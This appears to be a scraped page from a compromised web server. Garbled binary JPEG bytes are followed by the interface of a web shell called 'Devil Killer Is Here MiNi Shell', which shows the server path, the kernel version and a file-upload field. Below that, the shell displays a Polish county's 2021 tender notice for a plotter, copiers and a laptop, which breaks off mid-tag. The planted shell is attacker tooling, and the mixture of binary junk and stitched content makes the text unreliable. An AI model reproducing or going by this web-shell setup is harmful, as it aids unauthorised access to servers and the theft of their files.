JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210621/0008896201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00088962 z dnia 2021-06-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa urządzeń poligraficznych i informatycznych:<br/>Cz. I. zakup i dostarczenie fabrycznie nowego plotera<br/>Cz. II zakup fabrycznie nowych kserokopiarek szt.2 oraz komputera przenośnego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT CHOJNICKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351239</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">UL. 31 STYCZNIA 56</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chojnice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(52) 39 66 501</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">52 39 66 503</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@powiat.chojnice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat.chojnice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa urządzeń poligraficznych i informatycznych:<br/>Cz. I. zakup i dostarczenie fabrycznie nowego plotera<br/>Cz. II zakup fabrycznie nowych kserokopiarek szt.2 oraz komputera przenośnego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-871aede0-d269-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00088962</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000685/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa urządzeń poligraficznych I informatycznych (ploter, scaner,ksero,komputer)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/sp_chojnice/aukcje <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca<br/>2002 r. o świadczeniu usług drogą elektroniczną. Postęp. prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/sp_chojnice/aukcjeInstrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl<br/>znajdują sięw zakładce „Instrukcje dla Wykonawców" na stronie internetowej pod adresem:https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zalecenia (rekomendacje) zamawiającego. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny<br/>być zgodne z załącznikiem nr 2 do „Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx.jpg (.jpeg) ze szczególnym wskazaniem na .pdf W celu ewentualnej kompresji danych zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:.zip 7ZWśród rozszerzeń powszechnych a niewystępujących w rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi maksymalnie 5MB.W przypadku stosowania przez wykonawcę kwalifikowanego podpisu elektronicznego: ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na rozszerzenie .pdf i opatrzenie ich podpisem kwalifikowanym w formacie PAdES. pliki w innych formatach niż pdf zaleca się opatrzyć podpisem w formacie XAdES o typie zewnętrznym. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z<br/>dokumentem podpisywanym. Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu. Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. Zamawiający zaleca, aby<br/>wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty. Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji. Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert. Sugerujemy złożenie oferty na 24 godziny przed terminem składania ofert. Jeśli wykonawca pakuje dokumenty np. w plik o rozszerzeniu .zip zaleca się wcześniejsze podpisanie każdego ze skompresowanych plików. Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin" oraz uznaje go za wiążący, zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem: https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/viewZamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, szczegółowo opisane w pkt.7.9 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuję, że: Administratorem Państwa danych<br/>osobowych jest: Starosta Chojnicki.I nspektorem ochrony danych osobowych w Starostwie<br/>Powiatowym<br/>w Chojnicach jest Pan Mateusz Zarychta, tel. 505-540-306, email: mateusz@epomerania.pl. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>niniejszym postępowaniem o udzielenie zamówienia publicznego. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018), dalej „ustawa Pzp”; Państwa dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały cza strwania umowy; Obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; Posiadają Państwo− na<br/>podstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą m.in. obowiązki wynikające z RODO ), w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim<br/>osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust. 4).Ponadto wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem<br/>wykonawcy w postępowaniu, zobowiązuje się wykonawcę do złożenia w postępowaniu o udzielenie zamówienia publicznego oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO. Oświadczenie wymagane od wykonawcy w zakresie<br/>wypełnienia przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO zawiera druk oferty.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:− w związku z art. 17 ust. 3 lit. b, d<br/>lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO. __________________* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.10.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia stanowiącym załącznik nr 9 do SWZ, oraz projektowanych postanowieniach umownych stanowiących załączniki nr 7 do SWZ. Uwaga: wykonawca wypełnia szczegółowo formularz wpisując zaoferowane parametry w tabelę. Podane parametry mogą być wyższe. W tabele wpisano minimalne wymagania. <br/>Uwaga: wymagania minimalne: <br/>Część I<br/>1.	Zakup i dostarczenie fabrycznie nowego kolorowego wielofunkcyjnego cyfrowego kompaktowego urządzenie poligraficznego w ilości 1 szt., wraz z instalacją, uruchomieniem i przeszkoleniem pracowników w zakresie obsługi zamawianego urządzenia.<br/>Parametry ogólne: <br/>realizowane funkcje: Kopiowanie, skanowanie, drukowanie - monochromatyczne oraz kolorowe<br/>technologia obrazowania: Trwały, nierozmywający się toner, wydruki odporne na działanie wilgoci, suche natychmiast po wydruku<br/>Funkcja drukowania: <br/>minimalna szybkość druku formatu A1 monochromatyczna: 200 ark./godz.<br/>minimalna szybkość druku formatu A1 kolor: 200 ark./godz.<br/>podajniki papieru: Drukowanie z rolek o średnicy rdzenia 3” <br/>minimalna Ilość podajników: 2 automatyczne podajniki rolkowe<br/>szerokość papieru na rolce: 297 – 1067 mm<br/>gramatura papieru: 60 – 160 g/m2<br/>zestaw startowy tonera: Zestaw startowy powinien zwierać kompletne pojemniki z tonerem dla każdego koloru. Łączna ilość tonera to co najmniej 2 kg.<br/>oprogramowanie wspomagające drukowanie plików bez konieczności ich otwierania: Oprogramowanie w języku polskim bez ograniczenia ilości bezpłatnych licencji umożliwiające wysyłanie wielu plików TIFF, JPG bez koniczności otwierania każdego pliku osobno wraz z funkcją podglądu, automatycznego wyboru nośnika (rolki) i jakości wydruku oraz możliwością edycji parametrów drukowania.<br/>Funkcja skanowania: <br/>technologia : CIS lub CCD<br/>szerokość skanowania: 210 do 914 mm<br/>długość skanowanego wzorca: 210 do 15000 mm<br/>grubość skanowanego wzorca: do 0,7 mm<br/>automatyczne rozpoznawanie rozmiarów skanowanego dokumentu: tak<br/>powiększenie: 10 do 1000 %<br/>minimalna szybkość skanowania czarno biała: 14 metrów/min<br/>minimalna szybkość skanowania kolor: 4 metrów/min<br/>rozdzielczość skanowania: 550 dpi<br/>wyjściowe formaty skanowania: JPEG, PDF, PDF/A, TIFF w tym wielostronicowe PDF; PDF/A i TIFF<br/>skanowane : mapy, rysunki, linie, tekst (opisy na mapach), szkice, fotografia<br/>skanowanie materiałów: papier, kalka, folia<br/>miejsca docelowe skanowania: USB, FTP, SMB<br/>automatyczne czyszczenie /rozjaśnianie tła dla wszystkich rodzajów skanowanych /kopiowanych dokumentów: Osobna funkcja odpowiedzialna za kompensację tła (włączana bądź wyłączana przez operatora). Funkcja ta ma być niezależna od funkcji rozjaśnienia, przyciemniania obrazu.<br/><br/>Funkcja kopiowania: <br/>kopiowanie: Kolorowe i monochromatyczne z funkcją automatycznego czyszczenia tła niezależnie od funkcji rozjaśnienia<br/>obsługa kopiowania: Wszystkie funkcje dostępne na panelu urządzenia<br/>kopiowanie z materiałów: papier, kalka, folia<br/>skalowanie w zakresie: 10% - 1000%<br/>możliwości wprowadzania korekcji skali kopiowania : niezależnie dla osi X i Y<br/>szerokość kopiowanych oryginałów: 210 do 914 mm<br/>automatyczne rozpoznawanie szerokości oryginału i wybór rolki: automatyczny oraz ręczny<br/>Kontroler urządzenia: <br/>Oprogramowanie systemowe: dedykowane do obsługi urządzeń<br/>oprogramowanie użytkowe: W języku polskim obrazujące podstawowe nastawy plotera, stan tonerów, formaty założonych nośników papieru, kolejkowanie zadań z możliwością ich wstrzymywania, powtarzania.<br/>procesor: wielordzeniowy<br/>pamięć RAM: 8 GB<br/>dyski twarde, o łącznej pojemność min.: 1 TB<br/>interfejs sieciowy, min.: 100/1000 Mb/s<br/>oprogramowanie: Dołączone, zapewniające wykonywanie wszystkich możliwych operacji (skanowania, kopiowania i drukowania) w języku polskim<br/>zarządzanie pracą: Podglądanie, wyświetlanie, edytowanie, kolejkowanie, usuwanie, wysyłanie, zapisywanie modyfikacja kolejności zleceń, historia zdarzeń, monitorowanie ilości wydruków i materiałów eksploatacyjnych; użytkownik może wyświetlać stan drukarki i uzyskiwać dostęp do dokumentu pomocy online w języku polskim, a także zarządzać aplikacjami innych firm.<br/>bezpieczeństwo danych: Zaawansowana funkcjonalność: usuwania danych z dysków twardych urządzenia - E-niszczenie, IPsec, HTTPS,<br/>narzędzia administratora: Zabezpieczone logowanie administratora IT, zabezpieczone logowanie administratora CAD, rejestrowanie audytu, uwierzytelnianie użytkowników w lokalnym interfejsie użytkownika na potrzeby komunikacji FTP, SMB i WebDAV; konfigurowalne certyfikaty HTTPS<br/>narzędzia administratora – rozliczanie prac: Informacja na temat ilości zużytego toneru dla każdej wykonanej pracy.<br/>narzędzia administratora – rejestracja: Narzędzia do uwierzytelniania użytkowników które zapewnią im dostęp do drukarki po wprowadzeniu poświadczeń na panelu urządzenia<br/>interfejs użytkownika: Wielodotykowy, kolorowy panel użytkownika<br/>rozmiar ekranu: 10 cali<br/>zasilanie: 100–240 V, 50–60 Hz<br/>poziom hałasu, max.: podczas działania: 60 dB<br/>stężenie ozonu, max.: 0 mg/m3<br/>certyfikaty: ISO 9001 – 2008 dla organizacji serwisu Dostawcy; CE<br/>Usługi dodatkowe: <br/>gwarancja: 12 miesięcy (gwarancja producenta)<br/>serwis gwarancyjny bezpłatny w okresie trwania gwarancji: <br/>Serwis gwarancyjny musi obejmować: <br/>a) wymianę uszkodzonych części i mechanizmów;<br/>b) przeglądy serwisowy w cyklu 6 miesięcznym, w tym czyszczenie i regulacje, w celu zapewnienia najwyższej jakości wydruków<br/>c) pomoc techniczną – telefoniczną, e-mail<br/>dostarczenie urządzenia: Wniesienie, ustawienie, instalacja i uruchomienie urządzenia w pokoju wskazanym przez Zamawiającego. <br/>szkolenie z obsługi urządzenia: Przeszkolenie pracowników wskazanych przez Zamawiającego z zakresu prawidłowej obsługi urządzenia, przeprowadzone w siedzibie Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232140-7 - Plotery</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">31 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Cena ofertowa brutto –„C”- 60% Z tytułu niniejszego kryterium max. Ilość punków: 60<br/>Termin płatności za fakturę – „T”- 40 % Z tytułu niniejszego kryterium max. Ilość punków: 40</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 